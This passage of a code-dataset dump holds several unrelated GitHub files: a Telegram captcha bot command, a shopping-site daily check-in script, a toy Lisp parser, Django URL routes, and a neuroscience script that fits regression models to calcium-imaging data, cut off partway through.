(\"\\n\")\r\n\r\nfor timeterm, timevalue in yourTimesLabels.items():\r\n print ('%-10s ==> %d' % (timeterm, timevalue))\r\n\r\nprint (\"\\n\")\r\n\r\nprint (\"Voce adiciona \" + str(addedLife) + \" segundos de vida se parar de fumar.\")\r\nprint (\"Voce salva R$ \" + str(moneySaved) + \"se parar de fumar.\")\r\nprint (\"\\n\")\r\n\r\nprint (\"Voce tem fumado livre por \" + str(yourLunarMonths) + \" meses.\")\r\nprint (\"Voce tem fumado livre por \" + str(yourWeeks) + \" semanas.\")\r\nprint (\"Voce tem fumado livre por \" + str(yourDays) + \" dias.\")\r\nprint (\"Voce tem fumado livre por \" + str(yourHours) + \" horas.\")\r\nprint (\"Voce tem fumado livre por \" + str(yourMinutes) + \" minutos.\")\r\n\r\ndummy1 = raw_input(\"Programa encerrado. Para sair, tecle ENTER.\")","repo_name":"herrmannjob/DevTraining","sub_path":"Languages/Python/Exercises/PareDeFumar.py","file_name":"PareDeFumar.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38446112495","text":"\"\"\"Captcha welcome bot command\"\"\"\n\nfrom typing import Optional, List\nfrom io import BytesIO\nfrom math import ceil\nimport random\nimport datetime\n\nfrom sadbot.app import App, CHAT_MEMBER_STATUS_RESTRICTED\nfrom sadbot.classes.permissions import Permissions\nfrom sadbot.command_interface import CommandInterface, BOT_HANDLER_TYPE_NEW_USER\nfrom sadbot.message import Message\nfrom sadbot.bot_action import (\n BotAction,\n BOT_ACTION_TYPE_REPLY_IMAGE,\n BOT_ACTION_TYPE_RESTRICT_CHAT_MEMBER,\n BOT_ACTION_PRIORITY_HIGH,\n)\nfrom sadbot.classes.captcha import Captcha\nfrom sadbot.config import (\n CAPTCHA_KEYBOARD_BUTTONS_PER_LINE,\n CAPTCHA_EXTRA_TEXTS_NUMBER,\n CAPTCHA_EXPIRATION,\n)\nfrom sadbot.message_repository import MessageRepository\nfrom sadbot.chat_permissions import ChatPermissions\nfrom sadbot.functions import convert_time\n\n\nclass CaptchaWelcomeBotCommand(CommandInterface):\n \"\"\"This is the captcha welcome bot command class, it 'welcomes' new users lol\"\"\"\n\n def __init__(\n self,\n app: App,\n permissions: Permissions,\n captcha: Captcha,\n message_repository: MessageRepository,\n ):\n \"\"\"Initializes the captcha command\"\"\"\n self.app = app\n self.permissions = permissions\n self.captcha = captcha\n self.message_repository = message_repository\n\n @property\n def handler_type(self) -> int:\n return BOT_HANDLER_TYPE_NEW_USER\n\n @property\n def command_regex(self) -> str:\n \"\"\"Returns the regex for matching new users\"\"\"\n return r\"test\"\n\n def get_keyboard(self, captcha_id: str, captcha_text: str) -> List:\n \"\"\"Returns the inline keyboard for the captcha\"\"\"\n callback_prefix = f\"captcha-{captcha_id}-\"\n keyboard_data = [\n {\"text\": captcha_text, \"callback_data\": callback_prefix + captcha_text}\n ]\n for i in range(0, CAPTCHA_EXTRA_TEXTS_NUMBER):\n random_string = self.captcha.get_captcha_string()\n keyboard_data.append(\n {\n \"text\": random_string,\n \"callback_data\": f\"{callback_prefix}{random_string}\",\n }\n )\n random.shuffle(keyboard_data)\n inline_keyboard = []\n for i in range(\n 0,\n ceil((CAPTCHA_EXTRA_TEXTS_NUMBER + 1) / CAPTCHA_KEYBOARD_BUTTONS_PER_LINE),\n ):\n temp_list = []\n for j in range(\n i * CAPTCHA_KEYBOARD_BUTTONS_PER_LINE,\n i * CAPTCHA_KEYBOARD_BUTTONS_PER_LINE\n + CAPTCHA_KEYBOARD_BUTTONS_PER_LINE,\n ):\n if j > CAPTCHA_EXTRA_TEXTS_NUMBER:\n continue\n temp_list.append(keyboard_data[j])\n inline_keyboard.append(temp_list)\n return inline_keyboard\n\n @staticmethod\n def get_welcome_message(new_user: str) -> str:\n \"\"\"Returns a 'welcome' message lol\"\"\"\n time_string = convert_time(CAPTCHA_EXPIRATION)\n welcome_message_replies = [\n f\"Welcome {new_user}\\nPlease solve the captcha.\",\n f\"\"\"W-w.. welcomee {new_user} ~~ uwu~\\nP-p pweaswe c-c.. *blushing* c- c-an \"\"\"\n + \"\"\"ywou slwolve t-the capthwa for me {new_user} -senpai ~~\"\"\",\n f\"\"\"Hmmmmm. I bet {new_user} is a bot lol\\nAnd you know..\\nThere's space for \"\"\"\n + \"\"\"one bot here, and that's me.\\nHere's your test.\"\"\",\n f\"Yoo {new_user} wassup\\nCan ya solve da captcha?\",\n f\"{new_user} looking kinda sus, ngl.\\nProve us ur not the impostor.\",\n f\"\"\"嗨 {new_user},歡迎加入群。 請填寫驗證碼以驗證您是人類。 {time_string}\"\"\"\n + \"\"\"內不輸入驗證碼,會被自動踢出群。 在此之前,您將無法發送消息。 \"\"\"\n + \"\"\"這個組裡只有一個機器人,那個機器人就是我。\"\"\",\n ]\n return random.choice(welcome_message_replies)\n\n def get_reply(self, message: Optional[Message] = None) -> Optional[List[BotAction]]:\n \"\"\"Returns a reply that 'welcomes' a new user\"\"\"\n if message is None:\n return None\n if message.is_bot:\n return None\n expiration = CAPTCHA_EXPIRATION\n captcha_id = (\n str(message.chat_id)\n + \".\"\n + str(message.sender_id)\n + \".\"\n + str(message.message_id)\n + \".\"\n + str(int(datetime.datetime.utcnow().timestamp()))\n + \".\"\n + str(expiration)\n )\n captcha_text, captcha_image = self.captcha.get_captcha(captcha_id)\n bytes_io = BytesIO()\n bytes_io.name = \"captcha.jpeg\"\n captcha_image.save(bytes_io, \"JPEG\")\n bytes_io.seek(0)\n image_bytes = bytes_io.read()\n new_user = message.sender_name\n if message.sender_username is not None:\n new_user = \"@\" + message.sender_username\n welcome_message = self.get_welcome_message(new_user)\n inline_keyboard = self.get_keyboard(captcha_id, captcha_text)\n permissions = ChatPermissions(\n False, False, False, False, False, False, False, False\n )\n user_status_and_permissions = self.app.get_user_status_and_permissions(\n message.chat_id, message.sender_id\n )\n if (\n user_status_and_permissions is not None\n and user_status_and_permissions[0] == CHAT_MEMBER_STATUS_RESTRICTED\n ):\n self.permissions.set_user_permissions(\n message.sender_id, message.chat_id, user_status_and_permissions[1]\n )\n callback_manager_name = \"CaptchaTimeoutManager\"\n callback_manager_info = {\"captcha_id\": captcha_id}\n return [\n BotAction(\n BOT_ACTION_TYPE_REPLY_IMAGE,\n reply_text=welcome_message,\n reply_image=image_bytes,\n reply_inline_keyboard=inline_keyboard,\n reply_priority=BOT_ACTION_PRIORITY_HIGH,\n reply_callback_manager_name=callback_manager_name,\n reply_callback_manager_info=callback_manager_info,\n ),\n BotAction(\n BOT_ACTION_TYPE_RESTRICT_CHAT_MEMBER,\n reply_permissions=permissions,\n reply_ban_user_id=message.sender_id,\n reply_priority=BOT_ACTION_PRIORITY_HIGH,\n ),\n ]\n","repo_name":"hydrastro/sadbot","sub_path":"sadbot/commands/captcha_welcome.py","file_name":"captcha_welcome.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"18006292685","text":"# -*- coding: utf8 -*-\n\nimport requests, json, time, os\n\nrequests.packages.urllib3.disable_warnings()\n\ncookie = os.environ.get(\"cookie_smzdm\")\n\ndef main(*arg):\n try:\n msg = \"\"\n SCKEY = os.environ.get('SCKEY')\n s = requests.Session()\n s.headers.update({'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36'})\n t = round(int(time.time() * 1000))\n url = f'https://zhiyou.smzdm.com/user/checkin/jsonp_checkin?_={t}'\n\n headers = {\n \"cookie\" : cookie,\n 'Referer': 'https://www.smzdm.com/'\n }\n\n r = s.get(url, headers=headers, verify=False)\n print(r.text.encode('latin-1').decode('unicode_escape'))\n if r.json()[\"error_code\"] != 0 and SCKEY:\n scurl = f\"https://sc.ftqq.com/{SCKEY}.send\"\n data = {\n \"text\" : \"smzdm Cookie过期\",\n \"desp\" : r.text\n }\n requests.post(scurl, data=data)\n print(\"smzdm cookie失效\")\n msg += \"smzdm cookie失效\"\n else:\n msg += \"smzdm签到成功\"\n except Exception as e:\n print('repr(e):', repr(e))\n msg += '运行出错,repr(e):'+repr(e)\n return msg + \"\\n\"\n\ndef smzdm_pc(*arg):\n msg = \"\"\n global cookie\n clist = cookie.split(\"\\n\")\n i = 0\n while i < len(clist):\n msg += f\"第 {i+1} 个账号开始执行任务\\n\"\n cookie = clist[i]\n msg += main(cookie)\n i += 1\n return msg\n\nif __name__ == \"__main__\":\n if cookie:\n print(\"----------什么值得买开始尝试签到----------\")\n smzdm_pc()\n print(\"----------什么值得买签到执行完毕----------\")\n\n \n","repo_name":"snhey/CheckinBox","sub_path":"smzdmCheckin/smzdmCheckinForSCF.py","file_name":"smzdmCheckinForSCF.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12056591202","text":"def lex(s):\n \"\"\"Lex a string into a list of tokens.\"\"\"\n return [read_token(t) for t in\n s.replace('(', ' ( ').replace(')', ' ) ').split()]\n\n\ndef read_token(t):\n \"\"\"Convert a token to an int if possible. Otherwise, return as is.\"\"\"\n try:\n return int(t)\n except ValueError:\n return t\n\n\ndef parse_list(tokens):\n \"\"\"Parse a list out of the tokens.\"\"\"\n res = []\n for t in tokens:\n if t == '(':\n res.append([])\n elif t == ')':\n lst = res.pop()\n if res:\n res[-1].append(lst)\n else:\n return lst\n else:\n res[-1].append(t)\n\n\ndef parse(tokens):\n \"\"\"Turn a list of tokens into a tree of symbols and numbers.\"\"\"\n t = tokens[0]\n return parse_list(tokens) if t == '(' else t\n\n\ndef read_string(s):\n \"\"\"Parse a string.\"\"\"\n return parse(lex(s))\n","repo_name":"welliam/toy-interpreter","sub_path":"src/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"7631489924","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('',views.index,name='index'),\n path('department/',views.department,name='department'),\n path('course/',views.course,name='course'),\n path('past_question/',views.past_questions,name='past_questions'),\n path('past_detail/',views.past_details,name='past_detail'),\n path('about',views.about,name='about'),\n path('search',views.search,name='search')\n]","repo_name":"oladaniel97/past-question-site","sub_path":"business/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25033742906","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 26 14:31:34 2023\n\n \n (trial,1) = stim onset time\n (trial,2) = rule (Rule 1 or 2)\n (trial,3) = contingency (1: go stim, 0: nogo stim)\n (trial,4) = Lick (1: lick, 0: No lick)\n (trial,5) = Correct choice (1: correct, 0: incorrect)\n (trial,6) = stage info (1: Task, 0: Conditioning)\n\n@author: Jong Hoon Lee\n\"\"\"\n\n\"\"\" code updates:\n \n Sep 14 2022\n Allowing separation between conditions. This is to see if the same neurons with \n action encoding in rule 1 shows in rule2 etc\n \n Sep 27 2022\n Major overhaul of code, including comments and separating analysis between\n across all trials and rule1 vs rule2\n\n \n Nov 09 2022\n C index determines how the code runs:\n 0 : Runs without trial history, across all rules\n -1 : Runs with trial history, across all rules\n [1,2] : Separates rule 1 and rule 2\n [-3,-4] : Separates rule 1 and rule 2 but includes trial history\n \n\"\"\"\n\n# import packages \n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nfrom scipy.io import loadmat\nfrom scipy import ndimage\nfrom scipy import stats\nfrom sklearn.linear_model import TweedieRegressor, Ridge, ElasticNet, Lasso\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.model_selection import ShuffleSplit\nfrom sklearn.decomposition import PCA, SparsePCA\n\nfrom os.path import join as pjoin\nfrom numba import jit, cuda\n\n\n# from matplotlib.colors import BoundaryNorm\n\n# from sklearn.metrics import get_scorer_names, d2_tweedie_score, make_scorer\n\n\n# %% File name and directory\n\n# change fname for filename\n\n# fname = 'PPC_GLM_dataset_AllSession_FR_230209.mat'\nfname = 'CaData_all_withlicktime.mat'\nfdir = 'D:\\Python\\Data'\n# fname = 'GLM_dataset_220824_new.mat'\n\n\n# %% Helper functions for loading and selecting data\n# \n\n\nnp.seterr(divide = 'ignore') \ndef load_matfile(dataname = pjoin(fdir,fname)):\n \n MATfile = loadmat(dataname)\n D_ppc = MATfile['GLM_dataset']\n return D_ppc \n\ndef load_matfile_Ca(dataname = pjoin(fdir,fname)):\n \n MATfile = loadmat(dataname)\n D_ppc = MATfile['GLM_CaData']\n return D_ppc \n\n\ndef find_good_data():\n D_ppc = load_matfile()\n good_list = []\n for n in range(np.size(D_ppc,0)):\n S_all = np.zeros((1,max(D_ppc[n,2][:,0])+t_period+100))\n for sp in np.array(D_ppc[n,0]):\n if sp < np.size(S_all,1):\n S_all[0,sp[0]-1] = 1 #spike time starts at 1 but indexing starts at 0\n \n if np.mean(S_all)*1e3>1:\n good_list = np.concatenate((good_list,[n]))\n return good_list\n\n\ndef find_good_data_Ca(t_period):\n D_ppc = load_matfile_Ca()\n # good_list = np.arange(np.size(D_ppc,0))\n good_list = []\n t_period = t_period+prestim\n\n for n in range(np.size(D_ppc,0)):\n N_trial = np.size(D_ppc[n,2],0)\n \n \n # re-formatting Ca traces\n \n Y = np.zeros((N_trial,int(t_period/window)))\n for tr in range(N_trial):\n Y[tr,:] = D_ppc[n,0][0,int(D_ppc[n,2][tr,0])-1 \n - int(prestim/window): int(D_ppc[n,2][tr,0])\n + int(t_period/window)-1 - int(prestim/window)]\n if np.mean(Y) > 0.5:\n good_list = np.concatenate((good_list,[n]))\n \n \n return good_list\n\ndef sliding_median(arr, window):\n \n return np.median(np.lib.stride_tricks.sliding_window_view(arr, (window,)), axis=1)\n\n@jit(target_backend='cuda') \ndef import_data_w_spikes(n,prestim,t_period,window,c_ind):\n D_ppc = load_matfile()\n S_all = np.zeros((1,max(D_ppc[n,2][:,0])+t_period+100))\n L_all = np.zeros((1,max(D_ppc[n,2][:,0])+t_period+100))\n N_trial = np.size(D_ppc[n,2],0)\n \n # extracting spikes from data\n for sp in np.array(D_ppc[n,0]):\n if sp < np.size(S_all,1):\n S_all[0,sp[0]-1] = 1 #spike time starts at 1 but indexing starts at 0\n \n \n S = np.zeros((N_trial,t_period))\n S_pre = np.zeros((N_trial,prestim))\n for tr in range(N_trial):\n S[tr,:] = S_all[0,D_ppc[n,2][tr,0]-1:D_ppc[n,2][tr,0]+t_period-1]\n S_pre[tr,:] = S_all[0,D_ppc[n,2][tr,0]-prestim-1:D_ppc[n,2][tr,0]-1]\n \n # extracting spikes, end\n \n # extracting licks, the same way\n for l in np.array(D_ppc[n,1]):\n if l < np.size(L_all,1):\n L_all[0,l[0]-1] = 1 \n \n L = np.zeros((N_trial,t_period+prestim))\n for tr in range(N_trial):\n L[tr,:] = L_all[0,D_ppc[n,2][tr,0]-prestim-1:D_ppc[n,2][tr,0]+t_period-1]\n \n \n X = D_ppc[n,2][:,2:6] # task variables\n Y = [];\n Y2 = [];\n S = np.concatenate((S_pre,S),1)\n t_period = t_period+prestim\n \n \n if c_ind !=3:\n # remove conditioning trials \n S = np.concatenate((S[0:200,:],S[D_ppc[n,5][0][0]:,:]),0)\n X = np.concatenate((X[0:200,:],X[D_ppc[n,5][0][0]:,:]),0)\n L = np.concatenate((L[0:200,:],L[D_ppc[n,5][0][0]:,:]),0)\n\n # only contain conditioningt trials\n else:\n S = S[201:D_ppc[n,5][0][0]]\n X = X[201:D_ppc[n,5][0][0]]\n\n\n N_trial2 = np.size(S,0)\n\n # select analysis and model parameters with c_ind \n \n if c_ind == -1: \n # Adding previous trial correct vs wrong\n Xpre = np.concatenate(([0],X[0:-1,2]*X[0:-1,1]),0)\n Xpre = Xpre[:,None]\n X = np.concatenate((X,Xpre),1)\n X2 = X\n elif c_ind ==-2:\n Xpre = np.concatenate(([0],X[0:-1,2]*X[0:-1,1]),0)\n Xpre = Xpre[:,None] \n # X2 = np.column_stack([X[:,0],(X[:,0]-1)*-1,\n # X[:,3],(X[:,3]-1)*-1,\n # X[:,2]*X[:,1],Xpre])\n X2 = np.column_stack([X[:,0],X[:,3],\n X[:,2]*X[:,1],Xpre]) \n \n \n \n L2 = []\n for w in range(int(t_period/window)):\n l = np.sum(L[:,range(window*w,window*(w+1))],1)\n L2 = np.concatenate((L2,l))\n y = np.mean(S[:,range(window*w,window*(w+1))],1)*1e3\n y2 = np.sum(S[:,range(window*w,window*(w+1))],1)\n Y = np.concatenate((Y,y))\n Y2 = np.concatenate((Y2,y2))\n \n Y = np.reshape(Y,(int(t_period/window),N_trial2)).T\n Y2 = np.reshape(Y2,(int(t_period/window),N_trial2)).T\n L2 = np.reshape(L2,(int(t_period/window),N_trial2)).T\n return X2, Y, Y2, L2\n\ndef import_data_w_Ca(D_ppc,n,prestim,t_period,window,c_ind):\n # D_ppc = load_matfile_Ca()\n \n \n L_all = np.zeros((1,int(np.floor(D_ppc[n,3][0,max(D_ppc[n,2][:,0])]*1e3))+t_period+100))\n N_trial = np.size(D_ppc[n,2],0)\n \n # extracting licks, the same way\n for l in np.floor(D_ppc[n,1]*1e3):\n l = int(l) \n if l < np.size(L_all,1):\n L_all[0,l-1] = 1 \n \n L = np.zeros((N_trial,t_period+prestim))\n for tr in range(N_trial):\n stim_onset = int(np.round(D_ppc[n,3][0,D_ppc[n,2][tr,0]]*1e3))\n lick_onset = int(np.round(D_ppc[n,3][0,D_ppc[n,2][tr,3]]*1e3))\n lick_onset = lick_onset-stim_onset\n L[tr,:] = L_all[0,stim_onset-prestim-1:stim_onset+t_period-1]\n \n # reformatting lick rates\n L2 = []\n for w in range(int((t_period+prestim)/window)):\n l = np.sum(L[:,range(window*w,window*(w+1))],1)\n L2 = np.concatenate((L2,l)) \n \n L2 = np.reshape(L2,(int((t_period+prestim)/window),N_trial)).T\n\n\n X = D_ppc[n,2][:,2:6] # task variables\n Rt = D_ppc[n,5] # reward time relative to stim onset, in seconds\n t_period = t_period+prestim\n \n # re-formatting Ca traces\n Yraw = {}\n Yraw = D_ppc[n,0]\n \n \n \n # Yraw2 = ndimage.median_filter(Yraw, size = 3000)\n # Y_median = sliding_median(Yraw[0,:],200)\n Yraw2 = np.concatenate((np.flip(Yraw[0,0:3000],0),Yraw[0,:],Yraw[0,-3000:-1]),0)\n sliding_w= np.lib.stride_tricks.sliding_window_view(np.arange(np.size(Yraw,1)+6000), 6000)\n Ymed_wind = np.zeros((1,np.size(Yraw,1)))\n for s in np.arange(np.size(Yraw,1)):\n Ymed_wind[0,s] = np.median(Yraw2[sliding_w[s,:]])\n \n Yraw3 = Yraw-Ymed_wind+np.mean(Yraw)\n \n # fig, axes = plt.subplots(1,1)\n # axes.plot(np.arange(85141),ndimage.gaussian_filter(Yraw[0,:],1000))\n # axes.plot(np.arange(85141),ndimage.gaussian_filter(Yraw3[0,:],1000)) \n \n # Yraw[0,100:-99] = (Yraw[0,100:-99]-Y_median)/Y_median\n \n Y = np.zeros((N_trial,int(t_period/window)))\n for tr in range(N_trial):\n Y[tr,:] = Yraw3[0,D_ppc[n,2][tr,0]-1 - int(prestim/window): D_ppc[n,2][tr,0] + int(t_period/window)-1 - int(prestim/window)]\n \n \n # for t in np.arange(int(t_period/window)):\n # Y[:,t] = Y[:,t]- np/median(Y[:,t])\n\n\n \n # select analysis and model parameters with c_ind\n \n if c_ind != 3: \n # remove conditioning trials \n Y = np.concatenate((Y[0:200,:],Y[D_ppc[n,4][0][0]:,:]),0)\n X = np.concatenate((X[0:200,:],X[D_ppc[n,4][0][0]:,:]),0)\n L2 = np.concatenate((L2[0:200,:],L2[D_ppc[n,4][0][0]:,:]),0)\n else:\n # only contain conditioning trials \n Y = Y[201:D_ppc[n,4][0][0]]\n X = X[201:D_ppc[n,4][0][0]]\n L2 = L2[201:D_ppc[n,4][0][0]]\n\n \n # Add reward history\n Xpre = np.concatenate(([0],X[0:-1,2]*X[0:-1,1]),0)\n Xpre = Xpre[:,None]\n Xpre2 = np.concatenate(([0,0],X[0:-2,2]*X[0:-2,1]),0)\n Xpre2 = Xpre2[:,None]\n # Add reward instead of action\n X2 = np.column_stack([X[:,0],X[:,3],\n X[:,2]*X[:,1],Xpre]) \n\n \n\n \n return X2,Y, L2, Rt\n \n# %% Main function for GLM\n# %% glm_per_neuron function code\n\ndef glm_per_neuron(n,t_period,prestim,window,k,c_ind,ca, m_ind,fig_on): \n # if using spike data\n if ca == 0:\n X, Y, Y2,L = import_data_w_spikes(n,prestim,t_period,window,c_ind)\n else:\n # if using Ca data\n X, Y, L, Rt = import_data_w_Ca(D_ppc,n,prestim,t_period,window,c_ind)\n Y2 = Y\n \n \n t_period = t_period+prestim\n Yhat = [];\n Yhat1 = [];\n Yhat2 = [];\n TT2 = [];\n Intercept = [];\n CI2 = [];\n score = [];\n N_trial2 = np.size(X,0)\n\n \n # reg = TweedieRegressor(power = 0, alpha = 0)\n reg = ElasticNet(alpha = 4*1e-2, l1_ratio = 0.5) #Using a linear regression model with Ridge regression regulator set with alpha = 1\n # reg = Ridge(alpha = 4*1e-2)\n for w in range(int(t_period/window)):\n y = Y2[:,w]\n # l = L[:,w]*0\n # X2 = np.column_stack([np.ones_like(y),X[:,0],l,X[:,2:]])\n # X = np.column_stack([X[:,0],l,X[:,2:]])\n # X3 = np.column_stack([l,X])\n X3 = X\n Xm = np.zeros_like(X3)\n Xm[:,m_ind] = 1\n X3 = X3*Xm\n # adding kernels to each task variable\n if w*window <= prestim-window:\n X3[:,0:3] = 0;\n elif w*window <= prestim+1500-window:\n \n if ca == 0:\n X3[:,2]= 0;\n elif ca == 1:\n for tr in np.arange(np.size(L,0)):\n if np.isnan(Rt[tr,0]):\n X3[tr,2] = 0;\n else:\n if w*window <= prestim + Rt[tr,0]*1e3 -window:\n X3[tr,2] = 0;\n \n \n\n \n \n \n X2 = np.column_stack([np.ones_like(y),X3])\n ss= ShuffleSplit(n_splits=k, test_size=0.20, random_state=0)\n y2 = ndimage.gaussian_filter(y,0)\n cv_results = cross_validate(reg, X3, y2, cv = ss , \n return_estimator = True, \n scoring = 'explained_variance')\n theta = np.zeros((np.size(X2,1)-1,k))\n inter = np.zeros((1,k))\n pp = 0\n for model in cv_results['estimator']:\n theta[:,pp] = model.coef_ \n inter[:,pp] = model.intercept_\n pp = pp+1\n theta3 = np.concatenate((np.mean(inter,1),np.mean(theta,1)))\n yhat = X2 @theta3\n yhat1 = X2[0:200,:] @ theta3\n yhat2 = X2[200:,:] @ theta3\n \n \n score = np.concatenate((score, cv_results['test_score']))\n TT2 = np.concatenate((TT2,np.mean(theta,1)))\n Intercept = np.concatenate((Intercept,np.mean(inter,1)))\n CI2 = np.concatenate((CI2,stats.sem(theta,1)))\n\n Yhat = np.concatenate((Yhat,yhat))\n # Yhat1 = np.concatenate((Yhat1,yhat1))\n # Yhat2 = np.concatenate((Yhat2,yhat2))\n \n \n Yhat = np.reshape(Yhat,(int(t_period/window),N_trial2)).T\n # Yhat1 = np.reshape(Yhat1,(int(t_period/window),N_trial2)).T\n # Yhat2 = np.reshape(Yhat2,(int(t_period/window),N_trial2)).T\n \n \n TT2 = np.reshape(TT2,(int(t_period/window),np.size(X3,1))).T\n CI2 = np.reshape(CI2,(int(t_period/window),np.size(X3,1))).T\n score = np.reshape(score,(int(t_period/window),k))\n \n \n \n \n # Figures\n if fig_on ==1:\n fig, ((ax1, ax2),(ax3,ax4)) = plt.subplots(2,2,figsize=(10, 10))\n \n \n if c_ind == 0:\n cmap = ['tab:purple', 'tab:orange', 'tab:green','tab:blue']\n clabels = [\"contin\",\"action\",\"correct\",\"stim\"]\n elif c_ind == -1:\n cmap = ['tab:purple', 'tab:orange', 'tab:green','tab:blue','tab:olive']\n clabels = [\"contin\",\"action\",\"correct\",\"stim\",\"history\"]\n elif c_ind == -2:\n cmap = ['tab:purple','tab:blue','tab:red','tab:orange']\n clabels = [\"Contingency\",\"stim\",\"reward\",\"history\",]\n lstyles = ['solid','solid','solid','solid']\n\n # cmap = ['tab:orange','tab:purple','tab:blue','tab:red','tab:olive','tab:olive']\n # clabels = [\"lick\",\"Contingency\",\"stim\",\"reward\",\"history\",\"history2\"]\n # lstyles = ['solid','solid','solid','solid','solid','dashed']\n\n \n \n \n x_axis = np.arange(1,t_period,window)\n for c in range(np.size(X3,1)): \n ax2.plot(x_axis,ndimage.gaussian_filter(TT2[c,:],2),linewidth = 2.0,\n color = cmap[c], label = clabels[c], linestyle = lstyles[c])\n ax2.fill_between(x_axis,(ndimage.gaussian_filter(TT2[c,:],2) - CI2[c,:]),\n (ndimage.gaussian_filter(TT2[c,:],2 )+ CI2[c,:]), color=cmap[c], alpha = 0.2)\n \n # ax2.legend(loc = 'upper right')\n \n # e_lines = np.array([0,500,500+int(D_ppc[n,3]),2500+int(D_ppc[n,3])])\n e_lines = np.array([0,500,500+1000,2500+1000])\n e_lines = e_lines+prestim\n \n \n ax2.vlines(x =e_lines, \n ymin = np.amin(ndimage.gaussian_filter(TT2,sigma = [0,3])), \n ymax = np.amax(ndimage.gaussian_filter(TT2,sigma = [0,3])),\n linestyles = 'dashed',\n colors = 'black', \n linewidth = 2.0)\n \n ax4.plot(x_axis,ndimage.gaussian_filter(np.mean(score,1)*1e2,1))\n \n var_top = min(max(ndimage.gaussian_filter(np.mean(score,1)*1e2,1)),100)\n \n # Plotting firing rates for one condition VS the other\n # 0 : contingency \n # 1 : lick vs no lick\n # 2 : correct vs wrong\n # 3 : stim 1 vs stim 2\n # if c_ind ==0:\n # # stim_ind = X3[:,3] == 1 \n # else:\n stim_ind1 = X3[:,2] == 1 \n stim_ind2 = X3[:,2] == 0 \n \n \n ax1.plot(x_axis,ndimage.gaussian_filter(np.mean(Y[stim_ind1,:],0),2),\n linewidth = 2.0, color = cmap[2],label = 'Reward',linestyle = lstyles[3])\n ax1.plot(x_axis,ndimage.gaussian_filter(np.mean(Y[stim_ind2,:],0),2),\n linewidth = 2.0, color = cmap[2],label = 'No Reward',linestyle = lstyles[3])\n ax1.set_title('Firing rate y')\n ax1.legend(loc = 'upper right')\n \n \n # ax3.plot(x_axis,ndimage.gaussian_filter(np.mean(Yhat[stim_ind1,:],0),2),\n # linewidth = 2.0, color = cmap[3],linestyle = lstyles[3])\n # ax3.plot(x_axis,ndimage.gaussian_filter(np.mean(Yhat[stim_ind2,:],0),2),\n # linewidth = 2.0, color = cmap[3],linestyle = lstyles[4]) \n # ax3.set_title('Prediction y_hat')\n \n ax2.set_title('unit_'+str(n+1))\n ax4.set_title('explained variance')\n ax4.set_ylim(bottom = -2, top = var_top)\n plt.show()\n Model_Theta = TT2\n \n return X3, Y, Yhat, Model_Theta, score, Intercept\n\n# %% Main\n \n\n\n# %% Model analysis, categorizing each neuron\n\"\"\" \nData{score} = 100 by k\nData{coef} = n_x by 100 where n_x is the number of variables\nwindow2 : score and weight coefs are binned by a moving window \n with step size bin_size and window size window2 \n\nOUTPUT\nmax_ind : best index for peak of score(explained variance) (not in ms)\nbest_score : average score at max_ind\ncoef : Weight coefficients at max_ind\nmodel_mean : Weight coefficients across t_period\n \n\"\"\"\ndef Model_analysis(n,window, window2,Data,c_ind,ana_period):\n \n # time currently defined by window size* data size. ana_period should also be defined thus \n bin_size = int(window2/window)\n ana_bin = ana_period/(window2/2)\n\n Dat_length = np.size(Data[n,c_ind-1][\"score\"],0)\n Model_Theta = Data[n,c_ind-1][\"coef\"]/(np.max(np.abs(Data[n,c_ind-1][\"coef\"]))+1) # Soft normalization\n\n score_mean = np.zeros((1,2*int(Dat_length/bin_size)))\n score_pool = np.zeros((np.size(Data[n,c_ind-1][\"score\"],1),2*int(Dat_length/bin_size)))\n score_var = np.zeros((1,2*int(Dat_length/bin_size)))\n model_mean = np.zeros((np.size(Model_Theta,0),2*int(Dat_length/bin_size)))\n \n k = 0;\n for ind in np.arange(0,Dat_length-bin_size/2,int(bin_size/2)):\n ind = int(ind)\n score_pool[:,k] = np.mean(Data[n,c_ind-1][\"score\"][ind:ind+bin_size,:],0)\n score_mean[0,k] = np.mean(Data[n,c_ind-1][\"score\"][ind:ind+bin_size,:])\n score_var[0,k] = np.var(Data[n,c_ind-1][\"score\"][ind:ind+bin_size,:])\n model_mean[:,k] = np.mean(np.abs(Model_Theta[:,ind:ind+bin_size]),1)\n k = k+1\n \n max_ind = np.argmax(score_mean[0,int(ana_bin[0]):int(ana_bin[1])]) + int(ana_bin[0])\n best_score = score_mean[0,max_ind]\n coef = model_mean[:,max_ind]\n \n \n return max_ind, best_score, coef, model_mean, score_mean, score_var, score_pool\n\n# %% \n\nNvar = 4\n\ndef build_model(n, t_period, prestim, window,k,c_ind,ca):\n for m_ind in np.arange(Nvar):\n X, Y, Yhat, Model_Theta, score, intercept = glm_per_neuron(n, t_period, prestim, window,k,c_ind,ca,m_ind,0)\n Data[n,c_ind-1] = {\"coef\" : Model_Theta, \"score\" : score, 'Y' : Y,'Yhat' : Yhat}\n mi, bs, coef,beta_weights,mean_score, var_score,score_pool = Model_analysis(n, window, window2, Data,c_ind,ana_period)\n S[0,m_ind] = mean_score[0,mi]\n mean_score[mean_score DataS[n,c_ind-1,np.argmax(S)][\"var_score\"]):\n for m_ind in np.arange(Nvar):\n m_ind2 = np.unique(np.append(maxS,m_ind))\n X, Y, Yhat, Model_Theta, score, intercept = glm_per_neuron(n, t_period, prestim, window,k,c_ind,ca,m_ind2,0)\n Data[n,c_ind-1] = {\"coef\" : Model_Theta, \"score\" : score, 'Y' : Y,'Yhat' : Yhat}\n mi, bs, 